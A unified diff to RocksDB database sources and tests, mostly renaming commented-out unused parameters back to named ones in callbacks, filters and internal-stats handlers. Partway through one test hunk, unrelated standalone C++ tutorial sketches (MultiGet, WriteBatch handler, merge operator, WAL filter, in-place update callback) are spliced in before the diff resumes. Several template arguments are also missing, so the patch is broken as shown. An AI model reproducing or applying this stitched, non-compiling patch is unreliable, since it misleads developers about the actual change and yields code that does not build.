GetOptions(ColumnFamilyHandle* column_family) const override { return options_; } @@ -2419,8 +2412,8 @@ class ModelDB : public DB { virtual DBOptions GetDBOptions() const override { return options_; } using DB::Flush; - virtual Status Flush(const rocksdb::FlushOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Status Flush(const rocksdb::FlushOptions& options, + ColumnFamilyHandle* column_family) override { Status ret; return ret; } @@ -2430,35 +2423,33 @@ class ModelDB : public DB { #ifndef ROCKSDB_LITE virtual Status DisableFileDeletions() override { return Status::OK(); } - virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { return 
Status::OK(); } - virtual Status GetLiveFiles(std::vector<std::string>&, uint64_t* /*size*/, - bool /*flush_memtable*/ = true) override { + virtual Status GetLiveFiles(std::vector<std::string>&, uint64_t* size, + bool flush_memtable = true) override { return Status::OK(); } - virtual Status GetSortedWalFiles(VectorLogPtr& /*files*/) override { + virtual Status GetSortedWalFiles(VectorLogPtr& files) override { return Status::OK(); } - virtual Status DeleteFile(std::string /*name*/) override { - return Status::OK(); - } + virtual Status DeleteFile(std::string name) override { return Status::OK(); } virtual Status GetUpdatesSince( rocksdb::SequenceNumber, unique_ptr<rocksdb::TransactionLogIterator>*, - const TransactionLogIterator::ReadOptions& /*read_options*/ = + const TransactionLogIterator::ReadOptions& read_options = TransactionLogIterator::ReadOptions()) override { return Status::NotSupported("Not supported in Model DB"); } virtual void GetColumnFamilyMetaData( - ColumnFamilyHandle* /*column_family*/, - ColumnFamilyMetaData* /*metadata*/) override {} + ColumnFamilyHandle* column_family, + ColumnFamilyMetaData* metadata) override {} #endif // ROCKSDB_LITE - virtual Status GetDbIdentity(std::string& /*identity*/) const override { + virtual Status GetDbIdentity(std::string& identity) const override { return Status::OK(); } @@ -3331,7 +3322,7 @@ TEST_F(DBTest, DynamicMemtableOptions) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Wait", - [&](void* /*arg*/) { sleeping_task_low.WakeUp(); }); + [&](void* arg) { sleeping_task_low.WakeUp(); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); while (!sleeping_task_low.WokenUp() && count < 256) { @@ -4539,7 +4530,7 @@ class DelayedMergeOperator : public MergeOperator { public: explicit DelayedMergeOperator(DBTest* d) : db_test_(d) {} - virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, + virtual bool FullMergeV2(const MergeOperationInput& merge_in, MergeOperationOutput* merge_out) const override { db_test_->env_->addon_time_.fetch_add(1000); merge_out->new_value = ""; @@ -4890,7 +4881,7 @@ TEST_F(DBTest, AutomaticConflictsWithManualCompaction) { std::atomic<int> callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction()::Conflict", - [&](void* /*arg*/) { callback_count.fetch_add(1); }); + [&](void* arg) { callback_count.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); CompactRangeOptions croptions; croptions.exclusive_manual_compaction = false; @@ -5089,7 +5080,7 @@ TEST_F(DBTest, HardLimit) { std::atomic<int> callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack("DBImpl::DelayWrite:Wait", - [&](void* /*arg*/) { + [&](void* arg) { callback_count.fetch_add(1); sleeping_task_low.WakeUp(); }); @@ -5182,7 +5173,7 @@ TEST_F(DBTest, SoftLimit) { // Only allow one compaction going through. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "BackgroundCallCompaction:0", [&](void* /*arg*/) { + "BackgroundCallCompaction:0", [&](void* arg) { // Schedule a sleeping task.
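ModelDB above stubs out most of the DB surface. For contrast, the call shapes of two of the stubbed entry points on a real handle (keys and range bounds are illustrative):

#include <string>
#include <vector>
#include "rocksdb/db.h"

void CallShapes(rocksdb::DB* db) {
  // MultiGet: one status per key; values[i] is valid only if statuses[i].ok().
  std::vector<rocksdb::Slice> keys = {"k1", "k2"};
  std::vector<std::string> values;
  std::vector<rocksdb::Status> statuses =
      db->MultiGet(rocksdb::ReadOptions(), keys, &values);

  // GetApproximateSizes: estimated on-disk size of the [start, limit) range.
  rocksdb::Range r("a", "z");
  uint64_t size = 0;
  db->GetApproximateSizes(&r, 1, &size);
  (void)statuses;
  (void)size;
}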
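ModelDB::Write above replays batches through WriteBatch::Handler, the same iteration hook that is public API. A condensed sketch:

#include <cstdio>
#include "rocksdb/slice.h"
#include "rocksdb/write_batch.h"

class PrintingHandler : public rocksdb::WriteBatch::Handler {
 public:
  void Put(const rocksdb::Slice& key, const rocksdb::Slice& value) override {
    std::printf("PUT %s=%s\n", key.ToString().c_str(),
                value.ToString().c_str());
  }
  void Delete(const rocksdb::Slice& key) override {
    std::printf("DEL %s\n", key.ToString().c_str());
  }
};

void DumpBatch() {
  rocksdb::WriteBatch batch;
  batch.Put("a", "1");
  batch.Delete("b");
  PrintingHandler handler;
  batch.Iterate(&handler);  // replays operations in insertion order
}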
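DelayedMergeOperator above implements FullMergeV2 only to inject latency into merges. A functional sketch of the same interface that concatenates operands (the separator and class name are arbitrary):

#include <string>
#include "rocksdb/merge_operator.h"
#include "rocksdb/slice.h"

class AppendMerge : public rocksdb::MergeOperator {
 public:
  bool FullMergeV2(const MergeOperationInput& merge_in,
                   MergeOperationOutput* merge_out) const override {
    std::string* out = &merge_out->new_value;
    out->clear();
    if (merge_in.existing_value != nullptr) {
      out->assign(merge_in.existing_value->data(),
                  merge_in.existing_value->size());
    }
    for (const rocksdb::Slice& op : merge_in.operand_list) {
      if (!out->empty()) out->append(",");
      out->append(op.data(), op.size());
    }
    return true;  // false would signal a merge failure
  }
  const char* Name() const override { return "AppendMerge"; }
};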
sleeping_task_low.Reset(); env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, diff --git a/db/db_test2.cc b/db/db_test2.cc index 32f2896cd08..aa10789c851 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -497,9 +497,9 @@ TEST_F(DBTest2, WalFilterTest) { apply_option_at_record_index_(apply_option_for_record_index), current_record_index_(0) {} - virtual WalProcessingOption LogRecord( - const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) const override { + virtual WalProcessingOption LogRecord(const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) const override { WalFilter::WalProcessingOption option_to_return; if (current_record_index_ == apply_option_at_record_index_) { @@ -873,10 +873,11 @@ TEST_F(DBTest2, WalFilterTestWithColumnFamilies) { cf_name_id_map_ = cf_name_id_map; } - virtual WalProcessingOption LogRecordFound( - unsigned long long log_number, const std::string& /*log_file_name*/, - const WriteBatch& batch, WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) override { + virtual WalProcessingOption LogRecordFound(unsigned long long log_number, + const std::string& log_file_name, + const WriteBatch& batch, + WriteBatch* new_batch, + bool* batch_changed) override { class LogRecordBatchHandler : public WriteBatch::Handler { private: const std::map & cf_log_number_map_; @@ -1211,7 +1212,7 @@ class CompactionStallTestListener : public EventListener { public: CompactionStallTestListener() : compacted_files_cnt_(0) {} - void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { ASSERT_EQ(ci.cf_name, "default"); ASSERT_EQ(ci.base_input_level, 0); ASSERT_EQ(ci.compaction_reason, CompactionReason::kLevelL0FilesNum); @@ -1672,7 +1673,7 @@ TEST_F(DBTest2, SyncPointMarker) { std::atomic sync_point_called(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBTest2::MarkedPoint", - [&](void* /*arg*/) { sync_point_called.fetch_add(1); }); + [&](void* arg) { sync_point_called.fetch_add(1); }); // The first dependency enforces Marker can be loaded before MarkedPoint. // The second checks that thread 1's MarkedPoint should be disabled here. @@ -1941,7 +1942,7 @@ TEST_F(DBTest2, AutomaticCompactionOverlapManualCompaction) { // can fit in L2, these 2 files will be moved to L2 and overlap with // the running compaction and break the LSM consistency. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { + "CompactionJob::Run():Start", [&](void* arg) { ASSERT_OK( dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"}, {"max_bytes_for_level_base", "1"}})); @@ -2007,7 +2008,7 @@ TEST_F(DBTest2, ManualCompactionOverlapManualCompaction) { // the running compaction and break the LSM consistency. 
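The WalFilterTest hunks above exercise rocksdb::WalFilter, which is consulted for each WAL record during recovery and installed via Options::wal_filter. A minimal counting sketch (the class name is invented):

#include "rocksdb/wal_filter.h"
#include "rocksdb/write_batch.h"

class CountingWalFilter : public rocksdb::WalFilter {
 public:
  mutable int records = 0;
  WalProcessingOption LogRecord(const rocksdb::WriteBatch& /*batch*/,
                                rocksdb::WriteBatch* /*new_batch*/,
                                bool* /*batch_changed*/) const override {
    ++records;
    return WalProcessingOption::kContinueProcessing;
  }
  const char* Name() const override { return "CountingWalFilter"; }
};

// Install before opening: options.wal_filter = &filter;  (must outlive the DB)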
std::atomic flag(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { + "CompactionJob::Run():Start", [&](void* arg) { if (flag.exchange(true)) { // We want to make sure to call this callback only once return; diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 966fec2cf97..5ca4b19a253 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -1127,18 +1127,17 @@ UpdateStatus DBTestBase::updateInPlaceSmallerVarintSize(char* prevValue, } } -UpdateStatus DBTestBase::updateInPlaceLargerSize(char* /*prevValue*/, - uint32_t* /*prevSize*/, +UpdateStatus DBTestBase::updateInPlaceLargerSize(char* prevValue, + uint32_t* prevSize, Slice delta, std::string* newValue) { *newValue = std::string(delta.size(), 'c'); return UpdateStatus::UPDATED; } -UpdateStatus DBTestBase::updateInPlaceNoAction(char* /*prevValue*/, - uint32_t* /*prevSize*/, - Slice /*delta*/, - std::string* /*newValue*/) { +UpdateStatus DBTestBase::updateInPlaceNoAction(char* prevValue, + uint32_t* prevSize, Slice delta, + std::string* newValue) { return UpdateStatus::UPDATE_FAILED; } diff --git a/db/db_test_util.h b/db/db_test_util.h index 70cc6fd70a8..cd1265e21f1 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -187,7 +187,7 @@ class SpecialSkipListFactory : public MemTableRepFactory { using MemTableRepFactory::CreateMemTableRep; virtual MemTableRep* CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* /*logger*/) override { + const SliceTransform* transform, Logger* logger) override { return new SpecialMemTableRep( allocator, factory_.CreateMemTableRep(compare, allocator, transform, 0), num_entries_flush_); diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index c88bc30c1c9..c6334f8e067 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -56,9 +56,9 @@ void VerifyCompactionResult( class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { return false; } @@ -88,9 +88,9 @@ class KeepFilterFactory : public CompactionFilterFactory { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -105,7 +105,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -522,7 +522,7 @@ TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionTrivialMove) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); 
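The updateInPlace* helpers above back Options::inplace_callback. A sketch of the callback contract (the shrink-only policy shown here is illustrative):

#include <cstring>
#include <string>
#include "rocksdb/options.h"

// Overwrite in place when the new value fits; otherwise hand RocksDB the
// merged value so it re-inserts through the normal write path.
rocksdb::UpdateStatus ShrinkOnly(char* existing_value,
                                 uint32_t* existing_value_size,
                                 rocksdb::Slice delta, std::string* merged) {
  if (delta.size() <= *existing_value_size) {
    std::memcpy(existing_value, delta.data(), delta.size());
    *existing_value_size = static_cast<uint32_t>(delta.size());
    return rocksdb::UpdateStatus::UPDATED_INPLACE;
  }
  merged->assign(delta.data(), delta.size());
  return rocksdb::UpdateStatus::UPDATED;
}

// options.inplace_update_support = true;
// options.inplace_callback = ShrinkOnly;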
rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -593,23 +593,23 @@ TEST_P(DBTestUniversalCompactionParallel, UniversalCompactionParallel) { // Delay every compaction so multiple compactions will happen. std::atomic num_compactions_running(0); std::atomic has_parallel(false); - rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { - if (num_compactions_running.fetch_add(1) > 0) { - has_parallel.store(true); - return; - } - for (int nwait = 0; nwait < 20000; nwait++) { - if (has_parallel.load() || num_compactions_running.load() > 1) { - has_parallel.store(true); - break; - } - env_->SleepForMicroseconds(1000); - } - }); + rocksdb::SyncPoint::GetInstance()->SetCallBack("CompactionJob::Run():Start", + [&](void* arg) { + if (num_compactions_running.fetch_add(1) > 0) { + has_parallel.store(true); + return; + } + for (int nwait = 0; nwait < 20000; nwait++) { + if (has_parallel.load() || num_compactions_running.load() > 1) { + has_parallel.store(true); + break; + } + env_->SleepForMicroseconds(1000); + } + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():End", - [&](void* /*arg*/) { num_compactions_running.fetch_add(-1); }); + [&](void* arg) { num_compactions_running.fetch_add(-1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); options = CurrentOptions(options); @@ -984,7 +984,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest1) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -1030,7 +1030,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest2) { int32_t trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { ASSERT_TRUE(arg != nullptr); diff --git a/db/deletefile_test.cc b/db/deletefile_test.cc index 7a480fc4655..989c0c4118b 100644 --- a/db/deletefile_test.cc +++ b/db/deletefile_test.cc @@ -159,7 +159,7 @@ class DeleteFileTest : public testing::Test { } // An empty job to guard all jobs are processed - static void GuardFinish(void* /*arg*/) { + static void GuardFinish(void* arg) { TEST_SYNC_POINT("DeleteFileTest::GuardFinish"); } }; diff --git a/db/external_sst_file_test.cc b/db/external_sst_file_test.cc index 0187265b6bb..4a4e82e792d 100644 --- a/db/external_sst_file_test.cc +++ b/db/external_sst_file_test.cc @@ -395,9 +395,8 @@ class SstFileWriterCollector : public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, - EntryType /*type*/, SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { ++count_; return Status::OK(); } @@ -417,7 +416,7 @@ class SstFileWriterCollectorFactory : public TablePropertiesCollectorFactory { explicit SstFileWriterCollectorFactory(std::string prefix) : prefix_(prefix), num_created_(0) {} virtual TablePropertiesCollector* 
CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) override { + TablePropertiesCollectorFactory::Context context) override { num_created_++; return new SstFileWriterCollector(prefix_); } @@ -688,7 +687,7 @@ TEST_F(ExternalSSTFileTest, PurgeObsoleteFilesBug) { DestroyAndReopen(options); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::AddFile:FileCopied", [&](void* /*arg*/) { + "DBImpl::AddFile:FileCopied", [&](void* arg) { ASSERT_OK(Put("aaa", "bbb")); ASSERT_OK(Flush()); ASSERT_OK(Put("aaa", "xxx")); @@ -1127,7 +1126,7 @@ TEST_F(ExternalSSTFileTest, PickedLevelBug) { std::atomic bg_compact_started(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:Start", - [&](void* /*arg*/) { bg_compact_started.store(true); }); + [&](void* arg) { bg_compact_started.store(true); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); @@ -1408,7 +1407,7 @@ TEST_F(ExternalSSTFileTest, AddFileTrivialMoveBug) { ASSERT_OK(GenerateAndAddExternalFile(options, {22, 23}, 6)); // L2 rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* /*arg*/) { + "CompactionJob::Run():Start", [&](void* arg) { // fit in L3 but will overlap with compaction so will be added // to L2 but a compaction will trivially move it to L3 // and break LSM consistency @@ -1798,7 +1797,7 @@ TEST_F(ExternalSSTFileTest, FileWithCFInfo) { class TestIngestExternalFileListener : public EventListener { public: - void OnExternalFileIngested(DB* /*db*/, + void OnExternalFileIngested(DB* db, const ExternalFileIngestionInfo& info) override { ingested_files.push_back(info); } diff --git a/db/fault_injection_test.cc b/db/fault_injection_test.cc index 81ffae925a9..adfcb4db5a7 100644 --- a/db/fault_injection_test.cc +++ b/db/fault_injection_test.cc @@ -463,10 +463,10 @@ TEST_P(FaultInjectionTest, UninstalledCompaction) { std::atomic opened(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::Open:Opened", [&](void* /*arg*/) { opened.store(true); }); + "DBImpl::Open:Opened", [&](void* arg) { opened.store(true); }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BGWorkCompaction", - [&](void* /*arg*/) { ASSERT_TRUE(opened.load()); }); + [&](void* arg) { ASSERT_TRUE(opened.load()); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(OpenDB()); ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound)); diff --git a/db/file_indexer_test.cc b/db/file_indexer_test.cc index b424f91eacc..5cd8c2d2cf6 100644 --- a/db/file_indexer_test.cc +++ b/db/file_indexer_test.cc @@ -36,10 +36,10 @@ class IntComparator : public Comparator { const char* Name() const override { return "IntComparator"; } - void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - void FindShortSuccessor(std::string* /*key*/) const override {} + void FindShortSuccessor(std::string* key) const override {} }; class FileIndexerTest : public testing::Test { diff --git a/db/forward_iterator.cc b/db/forward_iterator.cc index affeca01879..65fff95956d 100644 --- a/db/forward_iterator.cc +++ b/db/forward_iterator.cc @@ -104,7 +104,7 @@ class LevelIterator : public InternalIterator { file_iter_->Seek(internal_key); valid_ = file_iter_->Valid(); } - void SeekForPrev(const Slice& /*internal_key*/) override { + void SeekForPrev(const Slice& internal_key) override { status_ = 
Status::NotSupported("LevelIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/forward_iterator.h b/db/forward_iterator.h index 8946b7b75e7..d4f32cba9fa 100644 --- a/db/forward_iterator.h +++ b/db/forward_iterator.h @@ -55,7 +55,7 @@ class ForwardIterator : public InternalIterator { ColumnFamilyData* cfd, SuperVersion* current_sv = nullptr); virtual ~ForwardIterator(); - void SeekForPrev(const Slice& /*target*/) override { + void SeekForPrev(const Slice& target) override { status_ = Status::NotSupported("ForwardIterator::SeekForPrev()"); valid_ = false; } diff --git a/db/internal_stats.cc b/db/internal_stats.cc index 70bd9523fa6..54723ea91f6 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -435,7 +435,7 @@ bool InternalStats::GetStringProperty(const DBPropertyInfo& property_info, } bool InternalStats::GetMapProperty(const DBPropertyInfo& property_info, - const Slice& /*property*/, + const Slice& property, std::map* value) { assert(value != nullptr); assert(property_info.handle_map != nullptr); @@ -487,7 +487,7 @@ bool InternalStats::HandleCompressionRatioAtLevelPrefix(std::string* value, return true; } -bool InternalStats::HandleLevelStats(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleLevelStats(std::string* value, Slice suffix) { char buf[1000]; const auto* vstorage = cfd_->current()->storage_info(); snprintf(buf, sizeof(buf), @@ -519,36 +519,35 @@ bool InternalStats::HandleCFMapStats(std::map* cf_stats) { return true; } -bool InternalStats::HandleCFStats(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleCFStats(std::string* value, Slice suffix) { DumpCFStats(value); return true; } bool InternalStats::HandleCFStatsNoFileHistogram(std::string* value, - Slice /*suffix*/) { + Slice suffix) { DumpCFStatsNoFileHistogram(value); return true; } -bool InternalStats::HandleCFFileHistogram(std::string* value, - Slice /*suffix*/) { +bool InternalStats::HandleCFFileHistogram(std::string* value, Slice suffix) { DumpCFFileHistogram(value); return true; } -bool InternalStats::HandleDBStats(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleDBStats(std::string* value, Slice suffix) { DumpDBStats(value); return true; } -bool InternalStats::HandleSsTables(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleSsTables(std::string* value, Slice suffix) { auto* current = cfd_->current(); *value = current->DebugString(true, true); return true; } bool InternalStats::HandleAggregatedTableProperties(std::string* value, - Slice /*suffix*/) { + Slice suffix) { std::shared_ptr tp; auto s = cfd_->current()->GetAggregatedTableProperties(&tp); if (!s.ok()) { @@ -575,34 +574,34 @@ bool InternalStats::HandleAggregatedTablePropertiesAtLevel(std::string* value, return true; } -bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->imm()->NumNotFlushed(); return true; } bool InternalStats::HandleNumImmutableMemTableFlushed(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { + DBImpl* db, + Version* version) { *value = cfd_->imm()->NumFlushed(); return true; } -bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* db, + Version* version) { // Return number of mem tables that are ready to flush (made immutable) *value = 
(cfd_->imm()->IsFlushPending() ? 1 : 0); return true; } bool InternalStats::HandleNumRunningFlushes(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->num_running_flushes(); return true; } -bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db, + Version* version) { // 1 if the system already determines at least one compaction is needed. // 0 otherwise. const auto* vstorage = cfd_->current()->storage_info(); @@ -611,74 +610,70 @@ bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* /*db*/, } bool InternalStats::HandleNumRunningCompactions(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->num_running_compactions_; return true; } -bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* db, + Version* version) { // Accumulated number of errors in background flushes or compactions. *value = GetBackgroundErrorCount(); return true; } -bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db, + Version* version) { // Current size of the active memtable *value = cfd_->mem()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db, + Version* version) { // Current size of the active memtable + immutable memtables *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateUnflushedMemTablesMemoryUsage(); return true; } -bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db, + Version* version) { // Current number of entries in the active memtable *value = cfd_->mem()->num_entries(); return true; } -bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db, + Version* version) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumEntries(); return true; } -bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db, + Version* version) { // Current number of deletes in the active memtable *value = cfd_->mem()->num_deletes(); return true; } -bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db, + Version* version) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumDeletes(); return true; } -bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl*
/*db*/, - Version* /*version*/) { +bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db, + Version* version) { // Estimate number of entries in the column family: // Use estimated entries in tables + total entries in memtables. const auto* vstorage = cfd_->current()->storage_info(); @@ -694,79 +689,77 @@ bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* /*db*/, } bool InternalStats::HandleNumSnapshots(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->snapshots().count(); return true; } bool InternalStats::HandleOldestSnapshotTime(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = static_cast(db->snapshots().GetOldestSnapshotTime()); return true; } -bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->GetNumLiveVersions(); return true; } -bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->GetSuperVersionNumber(); return true; } bool InternalStats::HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->IsFileDeletionsEnabled(); return true; } -bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* db, + Version* version) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->base_level(); return true; } -bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->GetTotalSstFilesSize(); return true; } bool InternalStats::HandleEstimatePendingCompactionBytes(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { + DBImpl* db, + Version* version) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->estimated_compaction_needed_bytes(); return true; } -bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, - DBImpl* /*db*/, +bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db, Version* version) { *value = (version == nullptr) ? 0 : version->GetMemoryUsageByTableReaders(); return true; } -bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db, + Version* version) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->EstimateLiveDataSize(); return true; } bool InternalStats::HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->MinLogNumberToKeep(); return true; } bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { const WriteController& wc = db->write_controller(); if (!wc.NeedsDelay()) { *value = 0; @@ -777,7 +770,7 @@ bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, } bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->write_controller().IsStopped() ? 
